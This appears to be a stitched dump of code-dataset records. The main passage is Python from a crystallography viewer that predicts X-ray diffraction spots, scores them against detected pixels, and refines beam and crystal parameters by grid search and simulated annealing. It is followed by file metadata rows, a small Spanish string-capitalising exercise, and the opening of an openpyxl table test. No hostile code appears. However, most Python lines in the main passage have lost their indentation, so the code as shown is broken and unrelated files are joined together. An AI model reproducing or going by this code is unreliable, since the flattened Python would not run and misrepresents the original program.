map_relative, color="red", name="<red_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_3box(self,frame):
from rstbx.bandpass import use_case_bp3_picture_fast_slow
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
half_mosaicity_rad = 0.1*pi/180.
cpp_results = use_case_bp3_picture_fast_slow(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
tophat=col((self.inputai.wavelength*0.9975,self.inputai.wavelength*1.0025,half_mosaicity_rad)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
picture_fast_slow = cpp_results[0].select(cpp_results[2])
map_relative_hi = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
picture_fast_slow = cpp_results[1].select(cpp_results[2])
map_relative_lo = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
# not sure if I've swapped x/y correctly
beam_coor = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(
[(0.5 + self.inputai.getBase().ybeam/self.pixel_size,
0.5 + self.inputai.getBase().xbeam/self.pixel_size)])
polydata = []
beam_pos = col(beam_coor[0])
for idx in range(len(map_relative_hi)):
hi_pos = col(map_relative_hi[idx])
lo_pos = col(map_relative_lo[idx])
radial_vector = (hi_pos-beam_pos)
radial_unit_vec = radial_vector.normalize()
radius = radial_vector.length()
tangential_unit_vec = col((-radial_unit_vec[1],radial_unit_vec[0])) # 90-degree rotation
tangential_excursion = tangential_unit_vec * radius * half_mosaicity_rad
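      # Each prediction becomes a rectangle: the long edge runs radially from
      # the hi- to the lo-energy limit, and the short edge is the tangential
      # smear, with arc length ~= radius * half_mosaicity_rad (small-angle
      # approximation).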
polydata.append( ([(hi_pos + tangential_excursion).elems,
(hi_pos - tangential_excursion).elems,
(lo_pos - tangential_excursion).elems,
(lo_pos + tangential_excursion).elems,
(hi_pos + tangential_excursion).elems
],{}) )
self.red_layer = frame.pyslip.AddPolygonLayer( # needs to be changed for Linux (antialiasing removed)
polydata, color="red", name="<red_layer>",
width=1.0,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_3_refactor(self,frame,half_deg,wave_HI, wave_LO,domain_size=0.):
from rstbx.bandpass import use_case_bp3,parameters_bp3
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
half_mosaicity_rad = half_deg*pi/180.
parameters = parameters_bp3(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
packed_tophat=col((wave_HI,wave_LO,half_mosaicity_rad)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
cpp_results = use_case_bp3(parameters=parameters)
cpp_results.set_active_areas(
frame.pyslip.tiles.raw_image.get_tile_manager(frame.inherited_params).effective_tiling_as_flex_int(
reapply_peripheral_margin=True))
cpp_results.prescreen_indices(self.inputai.wavelength)
cpp_results.set_domain_size(domain_size)
cpp_results.picture_fast_slow()
picture_fast_slow = cpp_results.hi_E_limit.select(cpp_results.observed_flag)
map_relative_hi = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
picture_fast_slow = cpp_results.lo_E_limit.select(cpp_results.observed_flag)
map_relative_lo = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
poly = cpp_results.spot_rectangles((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.))
map_relative_poly = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(poly)
cpp_polydata = []
for idx in range(0,len(map_relative_poly),5):
cpp_polydata.append( ([ map_relative_poly[idx+0],
map_relative_poly[idx+1],
map_relative_poly[idx+2],
map_relative_poly[idx+3],
map_relative_poly[idx+4]
],{}) )
    self.red_layer = frame.pyslip.AddPolygonLayer( # needs to be changed for Linux (antialiasing removed)
cpp_polydata, color="red", name="<red_layer>",
width=1.0,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
poly = cpp_results.spot_rectregions((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.),1.0)
map_relative_poly = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(poly)
cpp_polydata = []
for idx in range(0,len(map_relative_poly),5):
cpp_polydata.append( ([ map_relative_poly[idx+0],
map_relative_poly[idx+1],
map_relative_poly[idx+2],
map_relative_poly[idx+3],
map_relative_poly[idx+4]
],{}) )
    self.pink_layer = frame.pyslip.AddPolygonLayer( # needs to be changed for Linux (antialiasing removed)
cpp_polydata, color="pink", name="<pink_layer>",
width=1.0,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
print("Entering C++ pixels")
cpp_results.enclosed_pixels_and_margin_pixels()
print("Done with C++ pixels")
internal = cpp_results.enclosed_px
map_relative_pixels = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(internal)
self.yellow_layer = frame.pyslip.AddPointLayer(
map_relative_pixels, color="yellow", name="<yellow_layer>",
radius=1.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
internal = cpp_results.margin_px
map_relative_pixels = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(internal)
self.green_layer = frame.pyslip.AddPointLayer(
map_relative_pixels, color="green", name="<green_layer>",
radius=1.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
map_relative_pixels = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(
cpp_results.selected_predictions())
self.blue_layer = frame.pyslip.AddPointLayer(
map_relative_pixels, color="blue", name="<blue_layer>",
radius=2.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
    # Now figure out how to implement the scoring function. Do this in picture fast/slow coordinates.
# FIRST Set: spot bodypixels:
from annlib_ext import AnnAdaptorSelfInclude as AnnAdaptor
body_pixel_reference = flex.double()
for spot in self.spotfinder.images[self.frame_numbers[self.image_number]]["goodspots"]:
for pxl in spot.bodypixels:
body_pixel_reference.append(pxl.y + 0.5)
body_pixel_reference.append(pxl.x + 0.5)
self.adapt = AnnAdaptor(data=body_pixel_reference,dim=2,k=1)
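    # k=1 approximate-nearest-neighbour index over the spotfinder body
    # pixels; a queried pixel counts as a body pixel when its nearest
    # neighbour is essentially coincident (distance < 0.1 px, tested below).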
N_bodypix = body_pixel_reference.size()//2
# second set: predict box
enclosed_pixels = cpp_results.enclosed_px
N_enclosed = enclosed_pixels.size()
N_enclosed_body_pixels = 0
query = flex.double()
for pixel in enclosed_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
import math
for p in range(N_enclosed):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_enclosed_body_pixels += 1
# third set: marginal
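    # Marginal pixels are weighted with a smooth cosine taper,
    # 0.5 + 0.5*cos(pi*d), which falls from 1 at the box edge (d=0) to 0 at
    # the outer margin boundary (d=1), instead of a hard in/out cutoff.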
marginal_pixels = cpp_results.margin_px
margin_distances = cpp_results.margin_distances
N_marginal = marginal_pixels.size()
N_marginal_body_pixels = 0
marginal_body = 0
marginal_nonbody = 0
query = flex.double()
for pixel in marginal_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
for p in range(N_marginal):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_marginal_body_pixels += 1
marginal_body += 0.5 + 0.5 * math.cos (-math.pi * margin_distances[p]) #taking MARGIN==1
else:
marginal_nonbody += 0.5 + 0.5 * math.cos (math.pi * margin_distances[p])
print("marginal body/nonbody",marginal_body, marginal_nonbody)
print("There are %d body pixels of which %d are enclosed and %d are marginal leaving %d remote"%(
N_bodypix,N_enclosed_body_pixels,N_marginal_body_pixels,
N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels))
print("There are %d enclosed pixels of which %d are body, %d are nonbody"%(
N_enclosed,N_enclosed_body_pixels,N_enclosed-N_enclosed_body_pixels))
print("There are %d marginal pixels of which %d are body, %d are nonbody"%(
N_marginal,N_marginal_body_pixels,N_marginal-N_marginal_body_pixels))
Score = 0
# the scoring function to account for these spots:
# pink -- spot body pixels inside predict box = 0
# red -- spot body pixels > 2 pxl away from predict box = 1
Score += N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels
# gradation -- body pixels within the marginal zone
Score += marginal_body + marginal_nonbody
# blank -- nonbody pixels outside of 2 pixel margin = 0
# yellow -- nonbody pixels inside predict box = 1
Score += N_enclosed-N_enclosed_body_pixels
# gradation -- in between zone, within margin
print("The score is",Score)
def use_case_3_score_only(self,frame,half_deg,wave_HI, wave_LO):
from rstbx.bandpass import use_case_bp3,parameters_bp3
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
half_mosaicity_rad = half_deg*pi/180.
parameters = parameters_bp3(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
packed_tophat=col((wave_HI,wave_LO,half_mosaicity_rad)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
cpp_results = use_case_bp3(parameters=parameters)
cpp_results.set_active_areas(
frame.pyslip.tiles.raw_image.get_tile_manager(frame.inherited_params).effective_tiling_as_flex_int(
reapply_peripheral_margin=True))
cpp_results.picture_fast_slow()
poly = cpp_results.spot_rectangles((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.))
poly = cpp_results.spot_rectregions((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.),1.0)
cpp_results.enclosed_pixels_and_margin_pixels()
    # Now figure out how to implement the scoring function. Do this in picture fast/slow coordinates.
# FIRST Set: spot bodypixels:
from annlib_ext import AnnAdaptorSelfInclude as AnnAdaptor
body_pixel_reference = flex.double()
for spot in self.spotfinder.images[self.frame_numbers[self.image_number]]["goodspots"]:
for pxl in spot.bodypixels:
body_pixel_reference.append(pxl.y + 0.5)
body_pixel_reference.append(pxl.x + 0.5)
self.adapt = AnnAdaptor(data=body_pixel_reference,dim=2,k=1)
N_bodypix = body_pixel_reference.size()//2
# second set: predict box
enclosed_pixels = cpp_results.enclosed_px
N_enclosed = enclosed_pixels.size()
N_enclosed_body_pixels = 0
query = flex.double()
for pixel in enclosed_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
import math
for p in range(N_enclosed):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_enclosed_body_pixels += 1
# third set: marginal
marginal_pixels = cpp_results.margin_px
margin_distances = cpp_results.margin_distances
WGT = 50.
N_marginal = marginal_pixels.size()
N_marginal_body_pixels = 0
marginal_body = 0
marginal_nonbody = 0
query = flex.double()
for pixel in marginal_pixels:
query.append(pixel[0]); query.append(pixel[1])
self.adapt.query(query)
for p in range(N_marginal):
if math.sqrt(self.adapt.distances[p]) < 0.1:
N_marginal_body_pixels += 1
marginal_body += 0.5 + 0.5 * math.cos (-math.pi * margin_distances[p]) #taking MARGIN==1
else:
marginal_nonbody += 0.5 + 0.5 * math.cos (math.pi * margin_distances[p])
marginal_body *=WGT
if False:
print("marginal body/nonbody",marginal_body, marginal_nonbody)
print("There are %d body pixels of which %d are enclosed and %d are marginal leaving %d remote"%(
N_bodypix,N_enclosed_body_pixels,N_marginal_body_pixels,
N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels))
print("There are %d enclosed pixels of which %d are body, %d are nonbody"%(
N_enclosed,N_enclosed_body_pixels,N_enclosed-N_enclosed_body_pixels))
print("There are %d marginal pixels of which %d are body, %d are nonbody"%(
N_marginal,N_marginal_body_pixels,N_marginal-N_marginal_body_pixels))
Score = 0
# the scoring function to account for these spots:
# pink -- spot body pixels inside predict box = 0
# red -- spot body pixels > 2 pxl away from predict box = 1
Score += WGT*(N_bodypix-N_enclosed_body_pixels-N_marginal_body_pixels)
# gradation -- body pixels within the marginal zone
Score += marginal_body + marginal_nonbody
# blank -- nonbody pixels outside of 2 pixel margin = 0
# yellow -- nonbody pixels inside predict box = 1
Score += N_enclosed-N_enclosed_body_pixels
# gradation -- in between zone, within margin
return Score
def use_case_3_grid_refine(self,frame):
reserve_orientation = self.inputai.getOrientation()
wrapbp3 = wrapper_of_use_case_bp3( raw_image = frame.pyslip.tiles.raw_image,
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = frame.inherited_params)
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = self.inputai.wavelength*0.9975,
wave_LO = self.inputai.wavelength*1.0025,
half_mosaicity_deg = 0.1)
    #print("score...", wrapbp3.score_only())
wave_HI = self.inputai.wavelength*0.9975
wave_LO = self.inputai.wavelength*1.0025
low_score = None
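    # Exhaustive grid search: 5 mosaicities x 5 bandpasses x 4 mean-wavelength
    # multipliers x 3 angles per axis (3**3 orientations) = 2700 scorings;
    # keep the parameter set with the lowest score.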
for half_deg in [0.06, 0.08, 0.10, 0.12, 0.14]:
for bandpass in [0.004, 0.005, 0.006, 0.007, 0.008]:
for mean_multiplier in [0.9990, 1.0000, 1.0010, 1.0020]:
# A1=0.;A2=0.;A3=0.
for A1 in (math.pi/180.)*flex.double([-0.1,0.0,0.1]):
for A2 in (math.pi/180.)*flex.double([-0.1,0.0,0.1]):
for A3 in (math.pi/180.)*flex.double([-0.1,0.0,0.1]):
ori = reserve_orientation.rotate_thru((1,0,0),A1).rotate_thru((0,1,0),A2).rotate_thru((0,0,1),A3)
self.inputai.setOrientation(ori)
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
#score = self.use_case_3_score_only(
# frame,half_deg,HI,LO)
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = half_deg)
score = wrapbp3.score_only()
            if low_score is None or score < low_score:
low_score = score
best_params = (half_deg,HI,LO,ori,A1,A2,A3)
print("wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(HI,LO,100.*(LO-HI)/LO,half_deg,score))
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],low_score))
print("rotation angles",best_params[4],best_params[5],best_params[6])
return best_params
def use_case_3_simulated_annealing(self,subpixel=None):
reserve_orientation = self.inputai.getOrientation()
wrapbp3 = wrapper_of_use_case_bp3( raw_image = self.imagefiles.images[self.image_number],
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = self.horizons_phil,
sub = subpixel)
from rstbx.bandpass.simulated_annealing import SALight
SA = SALight()
    # Parameter vector SA.x:
    #   x[0]  half mosaicity in degrees
    #   x[1]  mid-wavelength adjustment factor
    #   x[2]  bandpass fractional full width
    #   x[3]  adjustment angle in degrees (rotation about lab x)
    #   x[4]  adjustment angle in degrees (rotation about lab y)
    #   x[5]  adjustment angle in degrees (rotation about lab z)
    # starting values; likely expected values
SA.x = flex.double([0.1,1.00,0.006,0.0,0.0,0.0])
SA.initial = SA.x.deep_copy()
# reasonable length scale (expected interval, half width)
SA.L = flex.double([0.02,0.001,0.001,0.05,0.05,0.05])
SA.format = "Mosaicity %6.3f Wave mean %7.4f bandpass %7.4f Angles %8.5f %8.5f %8.5f"
def set_variables_from_sa_x(x):
ori = reserve_orientation.rotate_thru((1,0,0),(math.pi/180.)*x[3]
).rotate_thru((0,1,0),(math.pi/180.)*x[4]
).rotate_thru((0,0,1),(math.pi/180.)*x[5])
self.inputai.setOrientation(ori)
mean_multiplier = x[1]
bandpass = x[2]
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = x[0])
#pack into format for calling function
these_params = (x[0],HI,LO,ori,(math.pi/180.)*x[3],(math.pi/180.)*x[4],(math.pi/180.)*x[5])
return these_params
set_variables_from_sa_x(SA.x)
last_score = wrapbp3.score_only()
low_score = last_score + 0 # makes a copy
Tstart = 600
for T in range(Tstart, 1, -1):
decreasing_increment = (T/Tstart)*SA.random_increment()
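      # linear cooling schedule: random steps are scaled by T/Tstart, so the
      # walk takes large moves early and progressively smaller ones as the
      # temperature counts down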
last_x = SA.x.deep_copy()
test_params = SA.x + decreasing_increment
if test_params[2]<=0: continue # can't have negative bandpass; unphysical!
if test_params[0]<=0: continue # can't have negative mosaicity; unphysical!
SA.x += decreasing_increment
print(T, SA.format%tuple(SA.x), end=' ')
set_variables_from_sa_x(SA.x)
new_score = wrapbp3.score_only()
print("Score %8.1f"%new_score, end=' ')
if new_score < low_score:
low_score = 1.0*new_score
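      # Metropolis criterion: downhill moves are always accepted; uphill
      # moves are accepted with probability exp(-dScore/(2.5*T)), letting
      # the search escape local minima while the temperature is high.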
if new_score < last_score:
probability_of_acceptance=1.0
else:
probability_of_acceptance = math.exp(-(new_score-last_score)/(2.5*T))
if flex.random_double(1)[0] < probability_of_acceptance:
#new position accepted
last_score = 1.0*new_score
print("accepted")
else:
SA.x = last_x.deep_copy()
print("rejected")
print("Final")
print(T, SA.format%tuple(SA.x),"Score %8.1f"%last_score,"final")
#these three lines set the bp3 wrapper so it can be used from the calling class (simple_integration.py)
best_params = set_variables_from_sa_x(SA.x)
wrapbp3.score_only()
self.bp3_wrapper = wrapbp3
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],last_score))
print("rotation angles",best_params[4],best_params[5],best_params[6])
return best_params
def use_case_3_simulated_annealing_7(self,subpixel=None):
reserve_orientation = self.inputai.getOrientation()
lowest_cell = max(reserve_orientation.unit_cell().parameters()[0:3])
wrapbp3 = wrapper_of_use_case_bp3( raw_image = self.imagefiles.images[self.image_number],
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = self.horizons_phil,
sub = subpixel)
from rstbx.bandpass.simulated_annealing import SALight
SA = SALight()
    # Parameter vector SA.x:
    #   x[0]  half mosaicity in degrees
    #   x[1]  mid-wavelength adjustment factor
    #   x[2]  bandpass fractional full width
    #   x[3]-x[5]  adjustment angles in degrees (rotations about lab x, y, z)
    #   x[6]  crystal domain size, in the same length units as the unit cell
    # starting values; likely expected values
SA.x = flex.double([0.1,1.00,0.006,0.0,0.0,0.0,lowest_cell*10.])
SA.initial = SA.x.deep_copy()
# reasonable length scale (expected interval, half width)
SA.L = flex.double([0.02,0.001,0.001,0.05,0.05,0.05,lowest_cell*2.])
SA.format = "Mosaicity %6.3f Wave mean %7.4f bandpass %7.4f Angles %8.5f %8.5f %8.5f, Domain %6.0f"
def set_variables_from_sa_x(x):
ori = reserve_orientation.rotate_thru((1,0,0),(math.pi/180.)*x[3]
).rotate_thru((0,1,0),(math.pi/180.)*x[4]
).rotate_thru((0,0,1),(math.pi/180.)*x[5])
self.inputai.setOrientation(ori)
mean_multiplier = x[1]
bandpass = x[2]
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = x[0],
domain_size = x[6])
#pack into format for calling function
these_params = (x[0],HI,LO,ori,(math.pi/180.)*x[3],(math.pi/180.)*x[4],(math.pi/180.)*x[5],x[6])
return these_params
set_variables_from_sa_x(SA.x)
last_score = wrapbp3.score_only()
low_score = last_score + 0 # makes a copy
Tstart = 600
for T in range(Tstart, 1, -1):
decreasing_increment = (T/Tstart)*SA.random_increment()
last_x = SA.x.deep_copy()
test_params = SA.x + decreasing_increment
if test_params[2]<=0: continue # can't have negative bandpass; unphysical!
if test_params[0]<=0: continue # can't have negative mosaicity; unphysical!
      if test_params[6]<lowest_cell: continue # domain size can't be smaller than one unit cell (lowest_cell holds the longest cell edge)
SA.x += decreasing_increment
print(T, SA.format%tuple(SA.x), end=' ')
set_variables_from_sa_x(SA.x)
new_score = wrapbp3.score_only()
print("Score %8.1f"%new_score, end=' ')
if new_score < low_score:
low_score = 1.0*new_score
if new_score < last_score:
probability_of_acceptance=1.0
else:
probability_of_acceptance = math.exp(-(new_score-last_score)/(2.5*T))
if flex.random_double(1)[0] < probability_of_acceptance:
#new position accepted
last_score = 1.0*new_score
print("accepted")
else:
SA.x = last_x.deep_copy()
print("rejected")
print("Final")
print(T, SA.format%tuple(SA.x),"Score %8.1f"%last_score,"final")
#these three lines set the bp3 wrapper so it can be used from the calling class (simple_integration.py)
best_params = set_variables_from_sa_x(SA.x)
wrapbp3.score_only()
self.bp3_wrapper = wrapbp3
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],last_score))
print("rotation angles",best_params[4],best_params[5],best_params[6],"Domain",best_params[7])
return best_params
def use_case_3_simulated_annealing_9(self,subpixel=None):
reserve_orientation = self.inputai.getOrientation()
lowest_cell = max(reserve_orientation.unit_cell().parameters()[0:3])
wrapbp3 = wrapper_of_use_case_bp3( raw_image = self.imagefiles.images[self.image_number],
spotfinder = self.spotfinder, imageindex = self.frame_numbers[self.image_number],
inputai = self.inputai,
spot_prediction_limiting_resolution = self.limiting_resolution,
phil_params = self.horizons_phil,
sub = subpixel)
from rstbx.bandpass.simulated_annealing import SALight
from cctbx.uctbx import unit_cell
from rstbx.symmetry.constraints import AGconvert
SA = SALight()
    # Parameter vector SA.x:
    #   x[0]  half mosaicity in degrees
    #   x[1]  mid-wavelength adjustment factor
    #   x[2]  bandpass fractional full width
    #   x[3]-x[5]  adjustment angles in degrees (rotations about lab x, y, z)
    #   x[6]  crystal domain size, in the same length units as the unit cell
    #   x[7]  multiplier on the a (and b) cell lengths
    #   x[8]  multiplier on the c cell length
    # starting values; likely expected values
SA.x = flex.double([0.1,1.00,0.006,0.0,0.0,0.0,lowest_cell*10.,1.00,1.00])
SA.initial = SA.x.deep_copy()
# reasonable length scale (expected interval, half width)
SA.L = flex.double([0.02,0.001,0.001,0.05,0.05,0.05,lowest_cell*2.,0.0002,0.0002])
SA.format = "Mosaicity %6.3f Wave mean %7.4f bandpass %7.4f Angles %8.5f %8.5f %8.5f, Domain %6.0f, a,c %6.4f %6.4f"
def set_variables_from_sa_x(x):
# ------ Go through hoops just to reset a,c without altering the angles
converter = AGconvert()
converter.forward(reserve_orientation)
model = converter.initial_model()
old_uc = unit_cell(metrical_matrix=model[3:9])
params = list(old_uc.parameters())
params[0] *= x[7] # change a
params[1] *= x[7] # change b for tetragonal, hexagonal a==b
params[2] *= x[8] # change c
new_uc = unit_cell(parameters=params)
converter.validate_and_setG(new_uc.metrical_matrix())
newori = converter.back_as_orientation()
# ------ finished with unit cell lengths
ori = newori.rotate_thru((1,0,0),(math.pi/180.)*x[3]
).rotate_thru((0,1,0),(math.pi/180.)*x[4]
).rotate_thru((0,0,1),(math.pi/180.)*x[5])
self.inputai.setOrientation(ori)
mean_multiplier = x[1]
bandpass = x[2]
HI = self.inputai.wavelength*(mean_multiplier-(bandpass/2.))
LO = self.inputai.wavelength*(mean_multiplier+(bandpass/2.))
wrapbp3.set_variables( orientation = self.inputai.getOrientation(),
wave_HI = HI,wave_LO = LO,half_mosaicity_deg = x[0],
domain_size = x[6])
#pack into format for calling function
these_params = (x[0],HI,LO,ori,(math.pi/180.)*x[3],(math.pi/180.)*x[4],(math.pi/180.)*x[5],x[6],x[7],x[8])
return these_params
set_variables_from_sa_x(SA.x)
last_score = wrapbp3.score_only()
low_score = last_score + 0 # makes a copy
Tstart = 900
for T in range(Tstart, 1, -1):
decreasing_increment = (T/Tstart)*SA.random_increment()
last_x = SA.x.deep_copy()
test_params = SA.x + decreasing_increment
if test_params[2]<=0: continue # can't have negative bandpass; unphysical!
if test_params[0]<=0: continue # can't have negative mosaicity; unphysical!
      if test_params[6]<lowest_cell: continue # domain size can't be smaller than one unit cell (lowest_cell holds the longest cell edge)
SA.x += decreasing_increment
print(T, SA.format%tuple(SA.x), end=' ')
set_variables_from_sa_x(SA.x)
new_score = wrapbp3.score_only()
print("Score %8.1f"%new_score, end=' ')
if new_score < low_score:
low_score = 1.0*new_score
if new_score < last_score:
probability_of_acceptance=1.0
else:
probability_of_acceptance = math.exp(-(new_score-last_score)/(2.5*T))
if flex.random_double(1)[0] < probability_of_acceptance:
#new position accepted
last_score = 1.0*new_score
print("accepted")
else:
SA.x = last_x.deep_copy()
print("rejected")
print("Final")
print(T, SA.format%tuple(SA.x),"Score %8.1f"%last_score,"final")
#these three lines set the bp3 wrapper so it can be used from the calling class (simple_integration.py)
best_params = set_variables_from_sa_x(SA.x)
wrapbp3.score_only()
self.bp3_wrapper = wrapbp3
print("Rendering image with wave %7.4f - %7.4f bandpass %.2f half %7.4f score %7.1f"%(
best_params[1],best_params[2],100.*(best_params[2]-best_params[1])/best_params[1],best_params[0],last_score))
print("rotation angles",best_params[4],best_params[5],best_params[6],"Domain",best_params[7])
return best_params
try:
from cxi_user import user_slip_callback
slip_callbacks.slip_callback = user_slip_callback
except Exception:
pass # no user-defined behavior
| 45.888307
| 259
| 0.681924
|
676802ef0c43452a3a2b929df283691fc6b7bddb
| 133
|
py
|
Python
|
ejercicios/Ejercicios_1/4.py
|
GonzalezGise/CaC-Python-Grupo-10-2167
|
e6e822ba17f9d2110ff41c2520f3b06a764ac0ed
|
[
"MIT"
] | null | null | null |
ejercicios/Ejercicios_1/4.py
|
GonzalezGise/CaC-Python-Grupo-10-2167
|
e6e822ba17f9d2110ff41c2520f3b06a764ac0ed
|
[
"MIT"
] | null | null | null |
ejercicios/Ejercicios_1/4.py
|
GonzalezGise/CaC-Python-Grupo-10-2167
|
e6e822ba17f9d2110ff41c2520f3b06a764ac0ed
|
[
"MIT"
] | 1
|
2021-11-19T23:56:45.000Z
|
2021-11-19T23:56:45.000Z
|
test = "pepito flores"
def Capitalizador(texto):  # parameter renamed to avoid shadowing the built-in input()
    output = texto.title()  # str.title() capitalizes the first letter of each word
    print(output)
    return output
Capitalizador(test)
| 16.625
| 26
| 0.699248
|
6bc93b108d25604454d798e0ab22dd8550577223
| 6,241
|
py
|
Python
|
openpyxl/worksheet/tests/test_table.py
|
zhangyu836/openpyxl
|
c2735a2a0fd81cf78082008bd4bee0fc84a3b130
|
[
"MIT"
] | 12
|
2019-08-07T16:48:21.000Z
|
2021-12-13T02:47:22.000Z
|
openpyxl/worksheet/tests/test_table.py
|
zhangyu836/openpyxl
|
c2735a2a0fd81cf78082008bd4bee0fc84a3b130
|
[
"MIT"
] | 19
|
2019-12-29T05:07:36.000Z
|
2021-04-22T18:09:49.000Z
|
openpyxl/worksheet/tests/test_table.py
|
zhangyu836/openpyxl
|
c2735a2a0fd81cf78082008bd4bee0fc84a3b130
|
[
"MIT"
] | 1
|
2020-05-26T20:33:10.000Z
|
2020-05-26T20:33:10.000Z
|
from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyxl
import pytest
from io import BytesIO
from zipfile import ZipFile
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def TableColumn():
from ..table import TableColumn
return TableColumn
class TestTableColumn:
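    # Round-trip pattern used throughout these tests: serialise with
    # to_tree()/tostring() and diff against reference XML, then parse the
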